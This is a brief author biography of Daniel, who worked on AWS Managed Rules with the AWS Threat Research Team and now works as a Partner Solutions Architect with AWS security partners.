The AWS Managed Rules was something Daniel worked on personally over a number of years during his time with the AWS Threat Research Team. Currently Daniel is working with Security competency technology partners from the AWS Partner Network as a Partner Solutions Architect enabling customer success through technical collaboration with AWS’s top security partners.